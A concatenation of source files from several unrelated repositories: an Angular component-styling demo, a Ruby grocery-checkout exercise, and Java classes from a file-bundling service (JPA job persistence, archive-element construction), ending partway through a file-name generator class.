<repo_name>amarbalu/angular-StylesComponent<file_sep>/src/app/app.component.ts import { Component } from '@angular/core'; @Component({ selector: 'my-app', templateUrl: './app.component.html', styleUrls: [ './app.component.css' ] }) export class AppComponent { name = 'Angular'; styleVar:object //ngStyle to create as a variable which can modify styles in ts ngOnInit():void{ this.styleVar={ backgroundColor:"green" } } } <file_sep>/src/app/hello.component.ts import { Component, Input } from '@angular/core'; @Component({ selector: 'hello', template: `<h1 class="child">1) Styles in decorator</h1> <p style="color:blue"> 2) Tag Styles</p>`, // 2) Tag styles styles: [`h1 { font-family: Lato;background-color:orange;} :host{ margin:10px; border:10px solid ; } :host-context(.backg){ display:block; background-color:red; } `] // 1) Component styles }) export class HelloComponent { @Input() name: string; }
9a741bb671ac15cf0badf201a4f4caa54cfca769
[ "TypeScript" ]
2
TypeScript
amarbalu/angular-StylesComponent
1bd94881e951aed5e71006a00771ad0bba046392
b6f8b70e2314e38be3c323ec26ba6045f1a2de9b
refs/heads/master
<file_sep> def find_item_by_name_in_collection(name, collection) i = 0 while i < collection.length do object_ele = collection[i] item_name = object_ele[:item] if name == item_name return object_ele end i+=1 end nil end def consolidate_cart(cart) new_array_result = [] i = 0 while i < cart.length do objects_in_cart = cart[i] item_name_in_cart = objects_in_cart[:item] new_obj = find_item_by_name_in_collection(item_name_in_cart, new_array_result) if new_obj == nil objects_in_cart[:count] = 1 new_array_result.push(objects_in_cart) else new_obj[:count] += 1 end i+=1 end return new_array_result end def apply_coupons(cart, coupons) puts coupons i = 0 while i < coupons.length do coupon_obj = coupons[i] item_name_in_coupon = coupon_obj[:item] cart_item_obj = find_item_by_name_in_collection(item_name_in_coupon, cart) couponed_item_name = "#{item_name_in_coupon} W/COUPON" cart_item_with_coupon_obj = find_item_by_name_in_collection(couponed_item_name, cart) if cart_item_obj && cart_item_obj[:count] >= coupon_obj[:num] if cart_item_with_coupon_obj cart_item_with_coupon_obj[:count] += coupon_obj[:num] cart_item_obj -= coupon_obj[:num] else cart_item_with_coupon_obj ={ :item => couponed_item_name, :price => coupon_obj[:cost] / coupon_obj[:num], :count => coupon_obj[:num], :clearance => cart_item_obj[:clearance] } cart << cart_item_with_coupon_obj cart_item_obj[:count] -= coupon_obj[:num] end end i+= 1 end cart end def apply_clearance(cart) i = 0 while i < cart.length do obj = cart[i] item_clearance = obj[:clearance] item_price = obj[:price] discount_price = item_price - (0.20 * item_price) if item_clearance == true obj[:price] = discount_price.round(2) end i+=1 end return cart end def checkout(cart, coupons) consolidated_cart = consolidate_cart(cart) couponed_cart = apply_coupons(consolidated_cart, coupons) clearance_cart = apply_clearance(couponed_cart) total = 0 i = 0 while i < clearance_cart.length do item_in_cart = clearance_cart[i] price_of_item = item_in_cart[:price] * 
item_in_cart[:count] total += price_of_item i+=1 end if total > 100 total = total - (0.10 * total) end return total end
f65739aa36bb8a4f451c2f6c4b80d56b9c97fe97
[ "Ruby" ]
1
Ruby
saimaar/programming-univbasics-nds-green-grocer-dumbo-web-111819
96de6769fc1966eacde0d070635fd084e052b6da
af66c8147fe7afc4012b5d054455c542dbc52cc8
refs/heads/master
<repo_name>carpenlc/EnterpriseBundler<file_sep>/parent/BundlerEJB/src/main/java/mil/nga/bundler/ejb/JobService.java package mil.nga.bundler.ejb; import java.util.ArrayList; import java.util.List; import javax.ejb.LocalBean; import javax.ejb.Stateless; import javax.persistence.EntityManager; import javax.persistence.EntityManagerFactory; import javax.persistence.NoResultException; import javax.persistence.Persistence; import javax.persistence.PersistenceContext; import javax.persistence.Query; import javax.persistence.TypedQuery; import javax.persistence.criteria.CriteriaBuilder; import javax.persistence.criteria.CriteriaQuery; import javax.persistence.criteria.Path; import javax.persistence.criteria.Root; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.exceptions.ServiceUnavailableException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.model.Job; import mil.nga.bundler.types.JobStateType; /** * Session Bean implementation class JobService * */ @Stateless @LocalBean public class JobService implements BundlerConstantsI { /** * Set up the Log4j system for use throughout the class */ private static final Logger LOGGER = LoggerFactory.getLogger( JobService.class); /** * JPA persistence entity manager. */ @PersistenceContext(unitName=APPLICATION_PERSISTENCE_CONTEXT) private EntityManager em; /** * Default Eclipse-generated constructor. */ public JobService() { } /** * Accessor method for the EntityManager object that will be used to * interact with the backing data store. * * @return A constructed EntityManager object. */ private EntityManager getEntityManager() throws ServiceUnavailableException { if (em == null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("Container-injected EntityManager is null. 
" + "Creating un-managed EntityManager."); } EntityManagerFactory emFactory = Persistence.createEntityManagerFactory( APPLICATION_PERSISTENCE_CONTEXT); if (emFactory != null) { em = emFactory.createEntityManager(); } else { LOGGER.warn("Unable to create un-managed EntityManager object."); } if (em == null) { throw new ServiceUnavailableException( "Unable to start the JPA subsystem. The injected " + "EntityManager object is null."); } } return em; } /** * Get a list of Jobs that have not yet completed. * * @return A list of jobs in a state other than "COMPLETE". */ public List<Job> getIncompleteJobs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> rootEntry = cq.from(Job.class); CriteriaQuery<Job> all = cq.select(rootEntry); cq.where(cb.notEqual(rootEntry.get("state"), JobStateType.COMPLETE)); cq.orderBy(cb.desc(rootEntry.get("startTime"))); TypedQuery<Job> allQuery = getEntityManager().createQuery(all); jobs = allQuery.getResultList(); } catch (NoResultException nre) { LOGGER.info("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]. Returned List<Job> object will be null."); jobs = new ArrayList<Job>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Incomplete job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * Retrieve a Job object from the target database. * * @param jobID The job ID (primary key) of the job to retrieve. * @return The target Job object. Null if the Job could not be found. 
*/ public Job getJob(String jobID) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job job = null; if ((jobID != null) && (!jobID.isEmpty())) { try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "where" clause cq.where( cb.equal( root.get("jobID"), cb.parameter(String.class, "jobID"))); // Create the query Query query = getEntityManager().createQuery(cq); // Set the value for the where clause query.setParameter("jobID", jobID); // Retrieve the data job = (Job)query.getSingleResult(); } catch (NoResultException nre) { LOGGER.warn("Unable to find Job associated with job ID [ " + jobID + " ]. Returned Job will be null."); } } else { LOGGER.warn("The input job ID is null or empty. Unable to " + "retrieve an associated job."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job [ " + jobID + " ] retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return job; } /** * Get a list of all jobIDs currently residing in the target data store. * * @return A list of jobIDs */ @SuppressWarnings("unchecked") public List<String> getJobIDs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<String> jobIDs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> e = cq.from(Job.class); cq.multiselect(e.get("jobID")); Query query = getEntityManager().createQuery(cq); jobIDs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("Unable to find any job IDs in the data store. " + "Returned list will be empty."); jobIDs = new ArrayList<String>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job IDs retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobIDs; } /** * Return a list of all Job objects in the target data store. * @return All existing Job objects. 
*/ public List<Job> getJobs() throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> root = cq.from(Job.class); // Add the "order by" clause sorting by time cq.orderBy(cb.desc(root.get("startTime"))); // Create the query TypedQuery<Job> query = getEntityManager().createQuery(cq); // Retrieve the data jobs = query.getResultList(); } catch (NoResultException nre) { LOGGER.warn("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]."); jobs = new ArrayList<Job>(); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * This method will retrieve Job objects from the database that * have a start_time (startTime) that fall between the input startTime and * endTime parameters. The time data stored in the database are not dates, * but long values. As such, the two time parameters should be formatted as * long time values (i.e. milliseconds from epoch). * * @param startTime Earliest time in the time slice to query. * @param endTime Latest time in the time slice to query. * @return A list of jobs in with a start time that fall between the two * input dates. */ public List<Job> getJobsByDate( long startTime, long endTime) throws ServiceUnavailableException { long start = System.currentTimeMillis(); List<Job> jobs = null; // Ensure the startTime is earlier than the endTime before submitting // the query to the database. if (startTime > endTime) { LOGGER.warn("The caller supplied a start time that falls " + "after the end time. Swapping start and end " + "times."); long temp = startTime; startTime = endTime; endTime = temp; } else if (startTime == endTime) { LOGGER.warn("The caller supplied the same time for both start " + "and end time. 
This method will likely yield a null " + "job list."); } try { CriteriaBuilder cb = getEntityManager().getCriteriaBuilder(); CriteriaQuery<Job> cq = cb.createQuery(Job.class); Root<Job> rootEntry = cq.from(Job.class); CriteriaQuery<Job> all = cq.select(rootEntry); Path<Long> pathToStartTime = rootEntry.get("startTime"); cq.where(cb.between(pathToStartTime, startTime, endTime)); cq.orderBy(cb.desc(pathToStartTime)); TypedQuery<Job> allQuery = getEntityManager().createQuery(all); jobs = allQuery.getResultList(); } catch (NoResultException nre) { LOGGER.warn("javax.persistence.NoResultException " + "encountered. Error message [ " + nre.getMessage() + " ]."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job list retrieved in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return jobs; } /** * Update the data in the back end database with the current contents * of the Job. * * @param job The Job object to update. * @return The container managed Job object. */ public Job update(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); Job managedJob = null; if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning update of job [ " + job.getJobID() + " ]..."); } // getEntityManager().getTransaction().begin(); managedJob = getEntityManager().merge(job); getEntityManager().flush(); // getEntityManager().getTransaction().commit(); } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job updated in [ " + (System.currentTimeMillis() - start) + " ] ms."); } return managedJob; } /** * Persist the input Job object into the back-end data store. * * @param job The Job object to persist. 
*/ public void persist(Job job) throws ServiceUnavailableException { long start = System.currentTimeMillis(); if (job != null) { if (LOGGER.isDebugEnabled()) { LOGGER.debug("...beginning persistence of job [ " + job.getJobID() + " ]..."); } // getEntityManager().getTransaction().begin(); getEntityManager().persist(job); getEntityManager().flush(); // getEntityManager().getTransaction().commit(); } else { LOGGER.warn("Called with a null or empty Job object. " + "Object will not be persisted."); } if (LOGGER.isDebugEnabled()) { LOGGER.debug("Job persisted in [ " + (System.currentTimeMillis() - start) + " ] ms."); } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/ArchiveElementFactory.java package mil.nga.bundler; import java.io.FileNotFoundException; import java.io.IOException; import java.net.URI; import java.nio.file.FileSystemNotFoundException; import java.nio.file.Files; import java.nio.file.Path; import java.nio.file.Paths; import java.util.ArrayList; import java.util.List; import java.util.Properties; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.bundler.messages.FileRequest; import mil.nga.bundler.model.ArchiveElement; import mil.nga.util.FileFinder; import mil.nga.util.URIUtils; /** * The bundler interface (<code>BundlerI</code>) has a single method that * accepts a list of <code>ArchiveElement</code> objects and an output * file name. This class was implemented to convert user-supplied lists * of files to the require list of ArchiveElement objects. * * @author <NAME> */ public class ArchiveElementFactory { /** * Set up the Log4j system for use throughout the class */ final static Logger LOGGER = LoggerFactory.getLogger( ArchiveElementFactory.class); /** * Constructor used to ensure the required file system drivers * are loaded. 
*/ public ArchiveElementFactory() { FileSystemFactory.getInstance().loadS3Filesystem(); FileSystemFactory.getInstance().listFileSystemsAvailable(); } /** * Alternate constructor added to support jUnit tests. * @param props The input Properties object should contain the * AWS configuration data. */ public ArchiveElementFactory(Properties props) { FileSystemFactory.getInstance(props).loadS3Filesystem(); FileSystemFactory.getInstance(props).listFileSystemsAvailable(); } /** * Create a full URI based on an input String-based file path. * * @param filePath Path to a target file. * @return Associated URI to the same target file. * @throws FileNotFoundException Thrown if the target file does not exist. * @throws FileSystemNotFoundException Thrown if the input URI resides on * a file system that is not available. */ public URI getURI(String filePath) throws FileNotFoundException, FileSystemNotFoundException { URI uri = null; if ((filePath != null) && (!filePath.isEmpty())) { uri = URIUtils.getInstance().getURI(filePath); LOGGER.info("String: " + filePath); LOGGER.info("URI: " + uri.toString()); if (!Files.exists(Paths.get(uri))) { throw new FileNotFoundException("Target file does not exist [ " + uri.toString() + " ]."); } } else { LOGGER.warn("Input filePath is null or not defined. Returned " + "URI will be null."); } return uri; } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. * * @param filePath String-based path to the target file. * @return The entry path that will be used to archive the product. */ private String getEntryPath(URI uri) { return EntryPathFactory.getInstance() .getEntryPath(uri); } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. 
This method signature * replaces the entire file path with the input user-specified path. * * @param filePath String-based path to the target file. * @return The entry path that will be used to archive the product. */ private String getEntryPath(URI uri, String replacementPath) { return EntryPathFactory.getInstance() .getEntryPath(uri, replacementPath); } /** * Calculate the archive entry path for the given input String-based path. * It turns out that calculating the entry path is fairly complicated. As * such it has been off-loaded to a separate class. * * @param uri The fill URI to the target file. * @param baseDir The base directory path. * @param archivePath User-specified string that will be pre-pended to the * entry path. * @return The entry path that will be used to archive the product. */ private String getEntryPath( URI uri, String baseDir, String archivePath) { return EntryPathFactory .getInstance() .getEntryPath(uri, baseDir, archivePath); } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( String file, String baseDir, String replacementPath) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, baseDir, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. 
Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( URI uri, String baseDir, String replacementPath) { ArchiveElement element = null; if (uri != null) { try { element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, baseDir, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + uri.toString() + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + uri.toString() + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file. * * @param file The target file for bundling. * @return An associated ArchiveElement object. 
*/ public ArchiveElement getArchiveElement(String file) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath(getEntryPath(uri)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Generate a single ArchiveElement object from an input file that was * derived from a directory traversal. * * @param file The target file for bundling. * @param baseDir The parent base-directory. * @param replacementPath Path that will be used to replace the target * base directory. * @return An associated ArchiveElement object. */ public ArchiveElement getArchiveElement( String file, String replacementPath) { ArchiveElement element = null; if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); element = new ArchiveElement.ArchiveElementBuilder() .uri(uri) .entryPath( getEntryPath( uri, replacementPath)) .size(Files.size(Paths.get(uri))) .build(); } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileNotFoundException fnfe) { LOGGER.warn("Target file [ " + file + " ] does not exist on the file system. 
Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unable to access target file [ " + file + " ] to obtain size data. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("Input file String is null or undefined. Return " + "value will be null."); } return element; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. This method signature was introduced * to handle file lists that resulted from flattening of a user-supplied * directory. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @param replacementPath User-specified string that will be pre-pended to the * entry path. May be null or empty. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. */ public List<ArchiveElement> getArchiveElements( List<String> files, String baseDir, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (String file : files) { try { ArchiveElement elem = getArchiveElement( file, baseDir, replacementPath); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. 
This method signature was introduced * to handle file lists that resulted from flattening of a user-supplied * directory. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @param replacementPath User-specified string that will be pre-pended to the * entry path. May be null or empty. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. */ public List<ArchiveElement> getURIArchiveElements( List<URI> files, String baseDir, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (URI file : files) { try { ArchiveElement elem = getArchiveElement( file, baseDir, replacementPath); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Convert a list of String path names into a List of ArchiveElement POJOs * for submission to the bundler code. * * @param files An input list of Strings representing the full path to a * target file for archive/compression. * @return A list of ArchiveElement objects for submission to the bundler * methods. The returned list may be empty, but will not be null. 
*/ public List<ArchiveElement> getArchiveElements(List<String> files) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((files != null) && (files.size() > 0)) { for (String file : files) { try { ArchiveElement elem = getArchiveElement(file); if (elem != null) { elements.add(elem); } else { LOGGER.warn("Unable to generate an ArchiveElement " + "object for file [ " + file + " ]."); } } catch (IllegalStateException ise) { LOGGER.warn("IllegalStateException raised while " + "converting file to ArchiveElement. Exception " + "message => [ " + ise.getMessage() + " ]."); } catch (FileSystemNotFoundException fsnfe) { LOGGER.warn("System error. No file system provider " + "available for the input URI scheme. Exception " + "message => [ " + fsnfe.getMessage() + " ]."); } } } return elements; } /** * Method generates a list of files that fall below the input URI. It is * intended that the input URI will identify a directory. If the input * URI is a regular file, that URI will be returned. * * @param uri URI of a directory. * @return List of files that fall below the input directory. The return * may be empty, but will not be null. */ private List<URI> getFileList(URI uri) { List<URI> files = new ArrayList<URI>(); if (uri != null) { try { List<URI> uris = FileFinder.listFiles(uri); if ((uris != null) && (uris.size() > 0)) { for (URI element : uris) { if (!Files.isDirectory(Paths.get(element))) { files.add(element); } } } } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while obtaining a " + "listing of URI [ " + uri.toString() + " ]. Exception message => [ " + ioe.getMessage() + " ]."); } } else { LOGGER.warn("The input URI is null. 
An empty list will be returned."); } return files; } public List<ArchiveElement> getArchiveElements(FileRequest request) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if (request != null) { if ((request.getFile() != null) && (!request.getFile().isEmpty())) { try { URI uri = getURI(request.getFile()); Path p = Paths.get(uri); if (Files.isDirectory(p)) { elements.addAll( getURIArchiveElements( getFileList(uri), p.toString(), request.getArchivePath())); } else { if (request.getArchivePath() != null) { elements.add(getArchiveElement(request.getFile(), request.getArchivePath())); } else { elements.add(getArchiveElement(request.getFile())); } } } catch (FileNotFoundException fnfe) { LOGGER.warn("Target directory [ " + request.getFile() + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while attempting " + "to walk the file tree for directory [ " + request.getFile() + " ]. Exception message => [ " + ioe.getMessage()); } } } else { } return elements; } /** * This method signature accepts a single <code>String</code> filename * that represents a directory. The code then expands the contents of that * directory generating the associated list of files. * * @param file String-based file object. If it doesn't represent a * directory a list containing a single ArchiveElement object will be * returned. * @param replacementPath Client-supplied replacement path. If the * replacement path is an empty String, the output will be just the file * name. If the replacement Path is null, the usual rules for generating * an entry path will be followed. * @return List of ArchiveElement objects. 
*/ public List<ArchiveElement> getArchiveElements( String file, String replacementPath) { List<ArchiveElement> elements = new ArrayList<ArchiveElement>(); if ((file != null) && (!file.isEmpty())) { try { URI uri = getURI(file); Path p = Paths.get(uri); if (Files.isDirectory(p)) { elements.addAll( getURIArchiveElements( getFileList(uri), p.toString(), replacementPath)); } else { if (replacementPath != null) { elements.add(getArchiveElement(file, replacementPath)); } else { elements.add(getArchiveElement(file)); } } } catch (FileNotFoundException fnfe) { LOGGER.warn("Target directory [ " + file + " ] does not exist on the file system. Exception " + "message => [ " + fnfe.getMessage() + " ]."); } catch (IOException ioe) { LOGGER.error("Unexpected IOException raised while attempting " + "to walk the file tree for directory [ " + file + " ]. Exception message => [ " + ioe.getMessage()); } } return elements; } public static void main (String[] args) { List<String> fileList = new ArrayList<String>(); fileList.add("file:///tmp/test_file_1"); fileList.add("/tmp/test_file_2"); fileList.add("file:///mnt/fbga/CDRG/cdrgxgdneur50kc_1/covdata/ctlm50.cov"); // Must add s3fs filesystem for the following to work. 
fileList.add("s3fs:///tmp/test_file_3"); List<ArchiveElement> outputList = (new ArchiveElementFactory()).getArchiveElements(fileList); for (ArchiveElement element : outputList) { System.out.println(element.toString()); } List<String> flatFileList = new ArrayList<String>(); flatFileList.add("file:///tmp/test/test2/test_file_2"); flatFileList.add("file:///tmp/test/test2/test_file_1"); flatFileList.add("file:/tmp/test/test2/test_file_3"); flatFileList.add("file:/tmp/test/test2/test_file_4"); List<ArchiveElement> outputList2 = (new ArchiveElementFactory()).getArchiveElements(flatFileList, "/tmp/test", "/new_root"); for (ArchiveElement element : outputList2) { System.out.println(element.toString()); } String directory = "/tmp"; List<ArchiveElement> directoryListing = (new ArchiveElementFactory()).getArchiveElements(directory, "blah/blah"); for (ArchiveElement element : directoryListing) { System.out.println(element.toString()); } String test = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFile = (new ArchiveElementFactory()).getArchiveElements(test, "blah/blah"); for (ArchiveElement element : singleFile) { System.out.println(element.toString()); } String testNoPathReplacement = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFileNoPathReplacement = (new ArchiveElementFactory()).getArchiveElements(testNoPathReplacement, ""); for (ArchiveElement element : singleFileNoPathReplacement) { System.out.println(element.toString()); } String testNoPathReplacement2 = "file:///tmp/test/test2/test_file_2"; List<ArchiveElement> singleFileNoPathReplacement2 = (new ArchiveElementFactory()).getArchiveElements(testNoPathReplacement2, null); for (ArchiveElement element : singleFileNoPathReplacement2) { System.out.println(element.toString()); } try { URI uri = (new ArchiveElementFactory()).getURI("/tmp/test"); System.out.println("URI : " + uri.toString()); } catch (Exception e) { e.printStackTrace(); } } } 
<file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/model/ArchiveElement.java package mil.nga.bundler.model; import java.io.Serializable; import java.net.URI; /** * Simple data structure that is used to hold the data required to bundle * a single file. This class holds the target file URI, the associated * path within the output archive, and the size of the file. * * @author <NAME> */ public class ArchiveElement implements Serializable { /** * Eclipse-generated serialVersionUID */ private static final long serialVersionUID = -5375301883838782257L; /** * URI locating the target file for bundling. */ private final URI uri; /** * Path within the output archive where the target file will be placed. */ private final String entryPath; /** * The size of the target file. */ private final long size; /** * Constructor enforcing the Builder design pattern. * @param builder Builder class implementing type checking. */ public ArchiveElement (ArchiveElementBuilder builder) { uri = builder.uri; entryPath = builder.entryPath; size = builder.size; } /** * Getter method for the Universal Resource Identifier (URI) associated * with the target file. * @return The URI associated with the target file. */ public URI getURI() { return uri; } /** * Getter method for the path within the output archive in which the * target file will reside. * @return The entry path. */ public String getEntryPath() { return entryPath; } /** * Getter method for the size of the target file. * @return The size of the target file. */ public long getSize() { return size; } /** * Convert to a human-readable String for logging purposes. 
*/ public String toString() { StringBuilder sb = new StringBuilder(); sb.append("Archive Entry => URI [ "); sb.append(getURI().toString()); sb.append(" ], Entry Path [ "); sb.append(getEntryPath()); sb.append(" ], size [ "); sb.append(getSize()); sb.append(" ]."); return sb.toString(); } /** * Class implementing the Builder creation pattern for new * ArchiveElement objects. * * @author <NAME> */ public static class ArchiveElementBuilder { private URI uri = null; private String entryPath = null; private long size = -1; /** * Method used to actually construct the BundlerJobMetrics object. * @return A constructed and validated BundlerJobMetrics object. */ public ArchiveElement build() throws IllegalStateException { ArchiveElement object = new ArchiveElement(this); validateArchiveElementObject(object); return object; } /** * Setter method for the URI of the target file to bundle. * * @param value The URI requested. * @return Reference to the parent builder object. */ public ArchiveElementBuilder uri(URI value) { uri = value; return this; } /** * Setter method for the path in the output archive in which the * target file will be placed. * * @param value The archive entry path. * @return Reference to the parent builder object. */ public ArchiveElementBuilder entryPath(String value) { entryPath = value; return this; } /** * Setter method for the size of the target file. * * @param value The size of the target file. * @return Reference to the parent builder object. */ public ArchiveElementBuilder size(long value) { size = value; return this; } /** * Validate that all required fields are populated. * * @param object The ArchiveElement object to validate. * @throws IllegalStateException Thrown if any of the required fields * are not populated. 
*/ public void validateArchiveElementObject(ArchiveElement object) throws IllegalStateException { if (object.getURI() == null) { throw new IllegalStateException ("Invalid value for target " + "URI [ null ]."); } if ((object.getEntryPath() == null) || (object.getEntryPath().isEmpty())) { throw new IllegalStateException ("Invalid value for entry " + "path [ " + object.getEntryPath() + " ]."); } if (object.getSize() < 0) { throw new IllegalStateException ("Invalid value for file " + "size [ " + object.getSize() + " ]."); } } } } <file_sep>/parent/BundlerCommon/src/main/java/mil/nga/bundler/FileNameGenerator.java package mil.nga.bundler; import java.io.FileNotFoundException; import java.net.URI; import java.nio.file.FileSystemNotFoundException; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import mil.nga.PropertyLoader; import mil.nga.bundler.exceptions.PropertiesNotLoadedException; import mil.nga.bundler.interfaces.BundlerConstantsI; import mil.nga.bundler.types.ArchiveType; import mil.nga.util.JobIDGenerator; import mil.nga.util.URIUtils; /** * Class used in the generation of output file names/URIs for individual * bundler jobs. * * @author <NAME> */ public class FileNameGenerator extends PropertyLoader implements BundlerConstantsI { /** * Set up the Log4j system for use throughout the class */ static final Logger LOGGER = LoggerFactory.getLogger( FileNameGenerator.class); /** * The job ID that will be used in the generation of output file names. */ private String jobID; /** * Staging area used for the output archives. */ private String stagingArea; /** * The template to use for the output filename. */ private String filenameTemplate; /** * Archive type that will be created. */ private ArchiveType type; /** * The file path separator */ private String pathSeparator = null; /** * Default constructor that sets the value for the staging area. If * the staging area is not read from the Properties file, the JVM * temporary directory is used. 
